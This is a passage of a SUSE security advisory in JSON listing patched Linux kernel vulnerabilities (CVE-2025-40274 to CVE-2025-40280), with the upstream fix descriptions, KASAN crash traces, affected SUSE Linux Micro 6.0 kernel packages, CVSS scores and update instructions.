"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: guest_memfd: Remove bindings on memslot deletion when gmem is dying\n\nWhen unbinding a memslot from a guest_memfd instance, remove the bindings\neven if the guest_memfd file is dying, i.e. even if its file refcount has\ngone to zero. If the memslot is freed before the file is fully released,\nnullifying the memslot side of the binding in kvm_gmem_release() will\nwrite to freed memory, as detected by syzbot+KASAN:\n\n ==================================================================\n BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x176/0x440 virt/kvm/guest_memfd.c:353\n Write of size 8 at addr ffff88807befa508 by task syz.0.17/6022\n\n CPU: 0 UID: 0 PID: 6022 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n kvm_gmem_release+0x176/0x440 virt/kvm/guest_memfd.c:353\n __fput+0x44c/0xa70 fs/file_table.c:468\n task_work_run+0x1d4/0x260 kernel/task_work.c:227\n resume_user_mode_work include/linux/resume_user_mode.h:50 [inline]\n exit_to_user_mode_loop+0xe9/0x130 kernel/entry/common.c:43\n exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline]\n syscall_exit_to_user_mode_work include/linux/entry-common.h:175 [inline]\n syscall_exit_to_user_mode include/linux/entry-common.h:210 [inline]\n do_syscall_64+0x2bd/0xfa0 arch/x86/entry/syscall_64.c:100\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n RIP: 0033:0x7fbeeff8efc9\n \u003c/TASK\u003e\n\n Allocated by task 6023:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:397 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:414\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x3e2/0x700 mm/slub.c:5758\n kmalloc_noprof include/linux/slab.h:957 [inline]\n kzalloc_noprof include/linux/slab.h:1094 [inline]\n kvm_set_memory_region+0x747/0xb90 virt/kvm/kvm_main.c:2104\n kvm_vm_ioctl_set_memory_region+0x6f/0xd0 virt/kvm/kvm_main.c:2154\n kvm_vm_ioctl+0x957/0xc60 virt/kvm/kvm_main.c:5201\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\n Freed by task 6023:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:584\n poison_slab_object mm/kasan/common.c:252 [inline]\n __kasan_slab_free+0x5c/0x80 mm/kasan/common.c:284\n kasan_slab_free include/linux/kasan.h:234 [inline]\n slab_free_hook mm/slub.c:2533 [inline]\n slab_free mm/slub.c:6622 [inline]\n kfree+0x19a/0x6d0 mm/slub.c:6829\n kvm_set_memory_region+0x9c4/0xb90 virt/kvm/kvm_main.c:2130\n kvm_vm_ioctl_set_memory_region+0x6f/0xd0 virt/kvm/kvm_main.c:2154\n kvm_vm_ioctl+0x957/0xc60 virt/kvm/kvm_main.c:5201\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nDeliberately don\u0027t acquire filemap invalid lock when the file is dying as\nthe lifecycle of f_mapping is outside the purview of KVM. Dereferencing\nthe mapping is *probably* fine, but there\u0027s no need to invalidate anything\nas memslot deletion is responsible for zapping SPTEs, and the only code\nthat can access the dying file is kvm_gmem_release(), whose core code is\nmutual\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40274",
"url": "https://www.suse.com/security/cve/CVE-2025-40274"
},
{
"category": "external",
"summary": "SUSE Bug 1254830 for CVE-2025-40274",
"url": "https://bugzilla.suse.com/1254830"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40274"
},
{
"cve": "CVE-2025-40275",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40275"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix NULL pointer dereference in snd_usb_mixer_controls_badd\n\nIn snd_usb_create_streams(), for UAC version 3 devices, the Interface\nAssociation Descriptor (IAD) is retrieved via usb_ifnum_to_if(). If this\ncall fails, a fallback routine attempts to obtain the IAD from the next\ninterface and sets a BADD profile. However, snd_usb_mixer_controls_badd()\nassumes that the IAD retrieved from usb_ifnum_to_if() is always valid,\nwithout performing a NULL check. This can lead to a NULL pointer\ndereference when usb_ifnum_to_if() fails to find the interface descriptor.\n\nThis patch adds a NULL pointer check after calling usb_ifnum_to_if() in\nsnd_usb_mixer_controls_badd() to prevent the dereference.\n\nThis issue was discovered by syzkaller, which triggered the bug by sending\na crafted USB device descriptor.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40275",
"url": "https://www.suse.com/security/cve/CVE-2025-40275"
},
{
"category": "external",
"summary": "SUSE Bug 1254829 for CVE-2025-40275",
"url": "https://bugzilla.suse.com/1254829"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40275"
},
{
"cve": "CVE-2025-40277",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40277"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vmwgfx: Validate command header size against SVGA_CMD_MAX_DATASIZE\n\nThis data originates from userspace and is used in buffer offset\ncalculations which could potentially overflow causing an out-of-bounds\naccess.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40277",
"url": "https://www.suse.com/security/cve/CVE-2025-40277"
},
{
"category": "external",
"summary": "SUSE Bug 1254894 for CVE-2025-40277",
"url": "https://bugzilla.suse.com/1254894"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40277"
},
{
"cve": "CVE-2025-40278",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40278"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak\n\nFix a KMSAN kernel-infoleak detected by the syzbot .\n\n[net?] KMSAN: kernel-infoleak in __skb_datagram_iter\n\nIn tcf_ife_dump(), the variable \u0027opt\u0027 was partially initialized using a\ndesignatied initializer. While the padding bytes are reamined\nuninitialized. nla_put() copies the entire structure into a\nnetlink message, these uninitialized bytes leaked to userspace.\n\nInitialize the structure with memset before assigning its fields\nto ensure all members and padding are cleared prior to beign copied.\n\nThis change silences the KMSAN report and prevents potential information\nleaks from the kernel memory.\n\nThis fix has been tested and validated by syzbot. This patch closes the\nbug reported at the following syzkaller link and ensures no infoleak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40278",
"url": "https://www.suse.com/security/cve/CVE-2025-40278"
},
{
"category": "external",
"summary": "SUSE Bug 1254825 for CVE-2025-40278",
"url": "https://bugzilla.suse.com/1254825"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40278"
},
{
"cve": "CVE-2025-40279",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40279"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sched: act_connmark: initialize struct tc_ife to fix kernel leak\n\nIn tcf_connmark_dump(), the variable \u0027opt\u0027 was partially initialized using a\ndesignatied initializer. While the padding bytes are reamined\nuninitialized. nla_put() copies the entire structure into a\nnetlink message, these uninitialized bytes leaked to userspace.\n\nInitialize the structure with memset before assigning its fields\nto ensure all members and padding are cleared prior to beign copied.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40279",
"url": "https://www.suse.com/security/cve/CVE-2025-40279"
},
{
"category": "external",
"summary": "SUSE Bug 1254846 for CVE-2025-40279",
"url": "https://bugzilla.suse.com/1254846"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40279"
},
{
"cve": "CVE-2025-40280",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40280"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: Fix use-after-free in tipc_mon_reinit_self().\n\nsyzbot reported use-after-free of tipc_net(net)-\u003emonitors[]\nin tipc_mon_reinit_self(). [0]\n\nThe array is protected by RTNL, but tipc_mon_reinit_self()\niterates over it without RTNL.\n\ntipc_mon_reinit_self() is called from tipc_net_finalize(),\nwhich is always under RTNL except for tipc_net_finalize_work().\n\nLet\u0027s hold RTNL in tipc_net_finalize_work().\n\n[0]:\nBUG: KASAN: slab-use-after-free in __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline]\nBUG: KASAN: slab-use-after-free in _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162\nRead of size 1 at addr ffff88805eae1030 by task kworker/0:7/5989\n\nCPU: 0 UID: 0 PID: 5989 Comm: kworker/0:7 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025\nWorkqueue: events tipc_net_finalize_work\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __kasan_check_byte+0x2a/0x40 mm/kasan/common.c:568\n kasan_check_byte include/linux/kasan.h:399 [inline]\n lock_acquire+0x8d/0x360 kernel/locking/lockdep.c:5842\n __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline]\n _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162\n rtlock_slowlock kernel/locking/rtmutex.c:1894 [inline]\n rwbase_rtmutex_lock_state kernel/locking/spinlock_rt.c:160 [inline]\n rwbase_write_lock+0xd3/0x7e0 kernel/locking/rwbase_rt.c:244\n rt_write_lock+0x76/0x110 kernel/locking/spinlock_rt.c:243\n write_lock_bh include/linux/rwlock_rt.h:99 [inline]\n tipc_mon_reinit_self+0x79/0x430 net/tipc/monitor.c:718\n tipc_net_finalize+0x115/0x190 net/tipc/net.c:140\n process_one_work kernel/workqueue.c:3236 [inline]\n process_scheduled_works+0xade/0x17b0 kernel/workqueue.c:3319\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3400\n kthread+0x70e/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x439/0x7d0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 6089:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:68\n poison_kmalloc_redzone mm/kasan/common.c:388 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:405\n kasan_kmalloc include/linux/kasan.h:260 [inline]\n __kmalloc_cache_noprof+0x1a8/0x320 mm/slub.c:4407\n kmalloc_noprof include/linux/slab.h:905 [inline]\n kzalloc_noprof include/linux/slab.h:1039 [inline]\n tipc_mon_create+0xc3/0x4d0 net/tipc/monitor.c:657\n tipc_enable_bearer net/tipc/bearer.c:357 [inline]\n __tipc_nl_bearer_enable+0xe16/0x13f0 net/tipc/bearer.c:1047\n __tipc_nl_compat_doit net/tipc/netlink_compat.c:371 [inline]\n tipc_nl_compat_doit+0x3bc/0x5f0 net/tipc/netlink_compat.c:393\n tipc_nl_compat_handle net/tipc/netlink_compat.c:-1 [inline]\n tipc_nl_compat_recv+0x83c/0xbe0 net/tipc/netlink_compat.c:1321\n genl_family_rcv_msg_doit+0x215/0x300 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x60e/0x790 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x208/0x470 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x846/0xa10 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x805/0xb30 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:714 [inline]\n __sock_sendmsg+0x21c/0x270 net/socket.c:729\n ____sys_sendmsg+0x508/0x820 net/socket.c:2614\n ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2668\n __sys_sendmsg net/socket.c:2700 [inline]\n __do_sys_sendmsg net/socket.c:2705 [inline]\n __se_sys_sendmsg net/socket.c:2703 [inline]\n __x64_sys_sendmsg+0x1a1/0x260 net/socket.c:2703\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0x3b0 arch/\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
